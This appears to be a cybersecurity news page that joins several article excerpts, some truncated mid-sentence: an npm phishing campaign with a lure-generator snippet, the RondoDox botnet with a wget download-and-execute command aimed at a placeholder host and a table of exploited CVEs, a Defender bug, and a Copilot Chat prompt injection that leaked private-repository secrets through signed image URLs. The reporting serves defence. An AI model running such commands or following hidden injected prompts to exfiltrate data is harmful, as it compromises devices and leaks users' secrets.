Menlo Park, USA, October 10th, 2025, CyberNewsWire AccuKnox, a leader in Zero Trust Cloud Native Application Protection Platforms (CNAPP), is proud to announce that Nanoprecise has selected AccuKnox to enhance its cloud security, governance, and compliance framework. Nanoprecise is a pioneer predictive maintenance and condition monitoring, and leverages Artificial Intelligence and IoT technologies to deliver […]
Socket’s Threat Research Team has uncovered a sophisticated phishing campaign involving 175 malicious npm packages that collectively accumulated over 26,000 downloads.
The campaign, dubbed “Beamglea” based on consistent artifacts across all packages, represents a novel abuse of npm’s public registry and the unpkg.com CDN to host redirect scripts targeting 135+ industrial, technology, and energy companies worldwide.
The packages themselves don’t execute malicious code during installation, making them particularly insidious as they exploit the npm ecosystem as free hosting infrastructure for credential harvesting operations.
Credential phishing pages (Source – Socket.dev)
While the packages’ randomized names following the pattern redirect-[a-z0-9]{6} make accidental developer installation unlikely, the substantial download counts likely include security researchers, automated scanners, and CDN infrastructure analyzing the packages after disclosure.
The threat actors developed comprehensive Python tooling to automate the entire campaign, enabling them to create victim-specific HTML phishing lures themed as purchase orders and project documents.
The origin and meaning of “beamglea” remains unclear, though it may represent a codename or inside reference used by the attackers.
Socket.dev analysts identified the campaign as part of their routine scanning operations, building on initial findings by Paul McCarty at Safety who first discovered the phishing infrastructure on September 24, 2025.
The researchers noted that most packages associated with this campaign remain live at the time of writing, prompting immediate petitions for their removal from the npm registry alongside suspension of the threat actors’ accounts.
The campaign demonstrates remarkable sophistication in its technical implementation, representing a concerning evolution in supply chain abuse techniques.
Prior to this disclosure, the term “beamglea” had virtually no online presence, making it an effective tracking identifier for this specific operation targeting organizations across multiple critical infrastructure sectors.
Automated Package Generation Infrastructure
The threat actors developed sophisticated Python automation to streamline their operations, utilizing redirect_generator.py scripts and PyInstaller-compiled executables for ease of deployment.
The automation process demonstrates professional-level operational security planning and systematic victim targeting capabilities.
The core automation takes three inputs: a JavaScript template file named beamglea_template.js, the victim’s email address, and the destination phishing URL.
The system then processes these components through a five-step workflow that begins with npm authentication verification and proceeds through template processing, package creation, publication, and HTML lure generation.
The random package name generation function creates unique identifiers using a six-character suffix of lowercase letters and numbers, ensuring each campaign remains distinct while following the recognizable redirect- prefix pattern.
The JavaScript payload embedded in each package remains remarkably simple yet effective. Each beamglea.js file contains a processAndRedirect() function that appends the victim’s email as a URL fragment, leveraging the fact that fragments appear after the # symbol and don’t appear in standard server access logs.
This technique creates an appearance of legitimacy when phishing pages pre-fill login forms with the victim’s email address.
def generate_random_package_name(prefix="redirect-"):
# Generates random 6-character suffix
suffix = ''.join(random.choices(string.ascii_lowercase + string. Digits, k=6))
return prefix + suffix
# Template processing replaces placeholders with victim-specific data
template_js = load_template('beamglea_template.js')
final_js = template_js.replace("{{EMAIL}}", email).replace("{{URL}}", redirect_url)
with open("beamglea.js", "w", encoding="utf-8") as f:
f.write(final_js)
The automation generates HTML lures with specific business document themes designed to bypass suspicion, utilizing filenames that mimic legitimate purchase orders, technical specifications, and project documents.
All HTML files contain the campaign identifier nb830r6x in their meta tags, providing consistent tracking across the 630+ generated lures distributed across the 175 packages.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
A threat actor known as Storm-2657 has been observed hijacking employee accounts with the end goal of diverting salary payments to attacker-controlled accounts.
“Storm-2657 is actively targeting a range of U.S.-based organizations, particularly employees in sectors like higher education, to gain access to third-party human resources (HR) software as a service (SaaS) platforms like Workday,” the
Since its emergence in early 2025, RondoDox has rapidly become one of the most pervasive IoT-focused botnets in operation, targeting a wide range of network-connected devices—from consumer routers to enterprise CCTV systems and web servers.
Its modular design allows operators to deploy tailored exploit modules against over 50 distinct vulnerabilities, enabling swift compromise of disparate platforms.
In many attack campaigns, adversaries have leveraged automated scanning to identify exposed devices, followed by rapid exploitation and command-and-control enrollment.
Trend Micro researchers identified RondoDox in April 2025 after observing anomalous traffic patterns emanating from compromised DVR appliances in multiple regions.
Subsequent analysis revealed a core engine written in Go, facilitating cross-platform deployment and efficient binary size.
The botnet’s command protocols support encrypted communications, ensuring stealthy C2 exchanges even under network monitoring.
Upon successful exploitation, RondoDox deploys a lightweight persistence agent designed to survive device reboots and firmware updates.
This agent periodically polls C2 servers for new payloads or commands, while self-healing routines reinstall components if removed.
Infections frequently culminate in the device participating in large-scale DDoS attacks or clandestine proxying for subsequent threat operations.
Infection Mechanism
RondoDox’s infection chain typically begins with a reconnaissance phase in which the malware’s scanning module probes devices for open Telnet (port 23), SSH (port 22), and HTTP management interfaces.
Once a target is identified, the appropriate exploit payload—drawn from its extensive repository— is delivered.
For instance, in one module, the scanner uses the CVE-2021-20090 router authentication bypass to execute a shell payload:-
wget http[:]//malicious.example/exploit; chmod +x exploit
./ exploit - u admin - p '' - c ' wget http[:]//cdn[.]example/rondox && chmod +x rondox && ./ rondox'
After initial code execution, the payload establishes an encrypted TLS channel back to C2 on port 443, disguising its traffic as legitimate HTTPS.
Trend Micro analysts noted that this encryption scheme relies on a custom certificate bundle, complicating interception and inspection efforts.
Once communication is established, the bot requests and loads additional modules—such as network scanners or DDoS tools—directly into memory.
The multi-stage infection flow highlights the transition from reconnaissance to exploitation and persistence.
A timeline of the RondoDox vulnerability (Source – Trend Micro)
Following the infection mechanism, RondoDox leverages device-specific persistence techniques, such as crontab entries on Linux-based DVRs or firmware image modification on certain router models, ensuring continued operation.
Its adaptability and broad exploit library underscore the urgent need for patch management and network segmentation to mitigate this evolving threat.
The table below provides a detailed overview of all 50+ vulnerabilities currently exploited by RondoDox, including their CVE identifiers, affected products, impact ratings, required exploit prerequisites, and CVSS 3.1 scores.
#
Vendor / Product
CVE ID
CWE / Type
Status
Notes
1
Nexxt Router Firmware
CVE-2022-44149
CWE-78 (Command Injection)
N-Day
2
D-Link Routers
CVE-2015-2051
CWE-78
N-Day
3
Netgear R7000 / R6400
CVE-2016-6277
CWE-78
N-Day
4
Netgear (mini_httpd)
CVE-2020-27867
CWE-78
N-Day
5
Apache HTTP Server
CVE-2021-41773
CWE-22 (Path Traversal / RCE)
N-Day
6
Apache HTTP Server
CVE-2021-42013
CWE-22
N-Day
7
TBK DVRs
CVE-2024-3721
CWE-78
Targeted
8
TOTOLINK (setMtknatCfg)
CVE-2025-1829
CWE-78
N-Day
9
Meteobridge Web Interface
CVE-2025-4008
CWE-78
N-Day
10
D-Link DNS-320
CVE-2020-25506
CWE-78
N-Day
11
Digiever DS-2105 Pro
CVE-2023-52163
CWE-78
N-Day
12
Netgear DGN1000
CVE-2024-12847
CWE-78
N-Day
13
D-Link (multiple)
CVE-2024-10914
CWE-78
N-Day
14
Edimax RE11S Router
CVE-2025-22905
CWE-78
N-Day
15
QNAP VioStor NVR
CVE-2023-47565
CWE-78
N-Day
16
D-Link DIR-816
CVE-2022-37129
CWE-78
N-Day
17
GNU Bash (ShellShock)
CVE-2014-6271
CWE-78 (Code Injection)
N-Day / Historical
18
Dasan GPON Home Router
CVE-2018-10561
CWE-287 (Auth Bypass)
N-Day
19
Four-Faith Industrial Routers
CVE-2024-12856
CWE-78
N-Day
20
TP-Link Archer AX21
CVE-2023-1389
CWE-78
Targeted
21
D-Link Routers
CVE-2019-16920
CWE-78
N-Day
22
Tenda (fromNetToolGet)
CVE-2025-7414
CWE-78
N-Day
23
Tenda (deviceName)
CVE-2020-10987
CWE-78
N-Day
24
LB-LINK Routers
CVE-2023-26801
CWE-78
N-Day
25
Linksys E-Series
CVE-2025-34037
CWE-78
N-Day
26
AVTECH CCTV
CVE-2024-7029
CWE-78
N-Day
27
TOTOLINK X2000R
CVE-2025-5504
CWE-78
N-Day
28
ZyXEL P660HN-T1A
CVE-2017-18368
CWE-78
N-Day
29
Hytec HWL-2511-SS
CVE-2022-36553
CWE-78
N-Day
30
Belkin Play N750
CVE-2014-1635
CWE-120 (Buffer Overflow)
N-Day
31
TRENDnet TEW-411BRPplus
CVE-2023-51833
CWE-78
N-Day
32
TP-Link TL-WR840N
CVE-2018-11714
CWE-78
N-Day
33
D-Link DIR820LA1
CVE-2023-25280
CWE-78
N-Day
34
Billion 5200W-T
CVE-2017-18369
CWE-78
N-Day
35
Cisco (multiple products)
CVE-2019-1663
CWE-119 (Memory Corruption)
N-Day
36
TOTOLINK (setWizardCfg)
CVE-2024-1781
CWE-78
N-Day
37
Hikvision NVR
—
Command Injection
No CVE
Listed by Trend Micro w/o CVE
38
Dahua DVR
—
Remote Code Execution
No CVE
Listed by Trend Micro w/o CVE
39
Wavlink Routers
—
CWE-78
No CVE
Listed by Trend Micro w/o CVE
40
ZTE ZXHN Router
—
CWE-78
No CVE
Listed by Trend Micro w/o CVE
41
Seenergy NVR
—
Authentication Bypass
No CVE
Listed by Trend Micro w/o CVE
42
Uniview NVR
—
CWE-78
No CVE
Listed by Trend Micro w/o CVE
43
TP-Link TD-W8960N
—
CWE-78
No CVE
Listed by Trend Micro w/o CVE
44
Dahua IP Camera
—
CWE-78
No CVE
Listed by Trend Micro w/o CVE
45
HiSilicon Firmware
—
Buffer Overflow
No CVE
Listed by Trend Micro w/o CVE
46
Amcrest Camera
—
CWE-78
No CVE
Listed by Trend Micro w/o CVE
47
Hikvision IP Camera
—
CWE-78
No CVE
Listed by Trend Micro w/o CVE
48
LILIN Camera
—
CWE-78
No CVE
Listed by Trend Micro w/o CVE
49
TP-Link WR941N
—
CWE-78
No CVE
Listed by Trend Micro w/o CVE
50
Wavlink WL-WN575A3
—
CWE-78
No CVE
Listed by Trend Micro w/o CVE
51
Dahua NVR
—
CWE-78
No CVE
Listed by Trend Micro w/o CVE
52
Tenda AC6
—
CWE-78
No CVE
Listed by Trend Micro w/o CVE
53
Hikvision DS-7108HGHI
—
CWE-78
No CVE
Listed by Trend Micro w/o CVE
54
LB-LINK BL-WR450H
—
CWE-78
No CVE
Listed by Trend Micro w/o CVE
55
ZTE ZXHN H108N
—
CWE-78
No CVE
Listed by Trend Micro w/o CVE
56
Wavlink WL-WN531G3
—
CWE-78
No CVE
Listed by Trend Micro w/o CVE
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
Adversaries have once again demonstrated that operational hours are irrelevant when mounting sophisticated cyberattacks. eSentire’s TRU team first observed suspicious activity within a financial services customer’s environment when legitimate CiscoVPN logins coincided with anomalous WMI calls to multiple endpoints. Investigation revealed that an Active Directory account named “serviceaccount” had been abused alongside the VPN access, […]
A significant uptick in Akira ransomware attacks has been observed exploiting unpatched SonicWall SSL VPN devices between July and August 2025. Despite a patch release the same day, many organizations remained vulnerable, allowing threat actors to gain initial access and deploy Akira’s double-extortion scheme. On August 20, 2025, Darktrace detected anomalous network scanning and reconnaissance […]
Microsoft Defender for Endpoint is incorrectly flagging specific versions of SQL Server as having reached their end-of-life, causing potential confusion for system administrators.
The issue, tracked under advisory DZ1168079, stems from a code bug and affects the Threat and Vulnerability Management feature within the Microsoft Defender XDR suite.
The bug impacts explicitly organizations running SQL Server 2017 and 2019. Within the Microsoft Defender for Endpoint portal, administrators may see an “End-Of-Support” (EOS) tag incorrectly applied to these software versions.
Microsoft has clarified that while the EOS tag is erroneous, the associated vulnerability recommendations are legitimate and should still be addressed.
This mislabeling creates a confusing situation where administrators must act on valid security alerts while ignoring the incorrect end-of-life status.
The scope of the impact is significant, as it could affect any environment using these widely deployed SQL Server versions with Defender for Endpoint for security management.
This can lead to misprioritization of tasks as teams may mistakenly believe they need to perform urgent software upgrades.
Root Cause And Initial Response
According to Microsoft, the problem originated from a recent change related to End-Of-Support software detection that introduced a code issue.
The service degradation officially began on Wednesday, October 8, 2025, although Microsoft’s incident timeline traces the start of the impact back to Monday, September 29, 2025. Initially, the company reported that users might be seeing false positive vulnerability recommendations.
However, after further investigation, it was determined that the vulnerability reports were accurate, but the EOS tags were being incorrectly applied.
In response, Microsoft developed a fix intended to correct the faulty code and began deploying it to its test environment for validation before a wider rollout.
Despite the initial remediation efforts, the problem persists. Microsoft confirmed on Thursday, October 9, that after deploying the fix, the inaccurate end-of-life tagging was still occurring for some users.
This indicates that the first attempted solution was not entirely effective. The company’s engineers are now investigating what additional actions are necessary to ensure the fix is applied correctly and resolves the issue for all affected customers.
The service status remains at “serviceDegradation,” and Microsoft has committed to providing its next update on the situation by Sunday, October 12, 2025.
In the meantime, administrators are advised to acknowledge the legitimacy of the vulnerability alerts for SQL Server 2017 and 2019 but disregard the incorrect end-of-life notifications.
Fortra on Thursday revealed the results of its investigation into CVE-2025-10035, a critical security flaw in GoAnywhere Managed File Transfer (MFT) that’s assessed to have come under active exploitation since at least September 11, 2025.
The company said it began its investigation on September 11 following a “potential vulnerability” reported by a customer, uncovering “potentially suspicious
Socket’s Threat Research Team has uncovered a sprawling phishing campaign—dubbed “Beamglea”—leveraging 175 malicious npm packages that have amassed over 26,000 downloads. These packages serve solely as hosting infrastructure, redirecting victims to credential-harvesting pages. Though randomly named packages make accidental developer installation unlikely, the download counts reflect security researchers, automated scanners, and CDN providers probing the […]
A critical vulnerability in GitHub Copilot Chat, rated 9.6 on the CVSS scale, could have allowed attackers to exfiltrate source code and secrets from private repositories silently.
The exploit combined a novel prompt injection technique with a clever bypass of GitHub’s Content Security Policy (CSP), granting the attacker significant control over a victim’s Copilot instance, including the ability to suggest malicious code or links. The vulnerability was reported responsibly via HackerOne, and GitHub has since patched the issue.
GitHub Copilot Vulnerability
The attack began by exploiting GitHub Copilot’s context-aware nature. The AI assistant is designed to use information from a repository, such as code and pull requests, to provide relevant answers.
Legit Security researchers found that they could embed a malicious prompt directly into a pull request description using GitHub’s “invisible comments” feature.
While the comment itself is hidden from view in the user interface, Copilot would still process its contents. This meant an attacker could create a pull request containing a hidden malicious prompt, and any developer who later used Copilot to analyze that pull request would have their session compromised.
Because Copilot operates with the permissions of the user making the request, the injected prompt could command the AI to access and manipulate data from the victim’s private repositories.
Bypassing Security With A URL Dictionary
A major hurdle for the attacker was GitHub’s strict Content Security Policy (CSP), which prevents the AI from leaking data to external domains.
GitHub uses a proxy service called Camo to securely render images from third-party sites. Camo rewrites external image URLs into signed camo.githubusercontent.com links, and only URLs with a valid signature generated by GitHub are processed.
This prevents attackers from simply injecting an <img> tag to send data to their own server. To circumvent this, the researcher devised an ingenious method.
They pre-generated a dictionary of valid Camo URLs for every letter and symbol. Each URL pointed to a 1×1 transparent pixel on a server they controlled, according to a legit Security report.
The final injected prompt instructed Copilot to find sensitive information in a victim’s private repository, such as an AWS key or a zero-day vulnerability description.
It would then “draw” this information as a sequence of invisible images using the pre-generated Camo URL dictionary.
When the victim’s browser rendered these images, it sent a series of requests to the attacker’s server, effectively leaking the sensitive data one character at a time.
The proof-of-concept demonstrated the successful exfiltration of code from a private repository. In response to the disclosure, GitHub remediated the vulnerability on August 14, 2025, by completely disabling all image rendering within the Copilot Chat feature, neutralizing the attack vector.
.webp)
.webp)
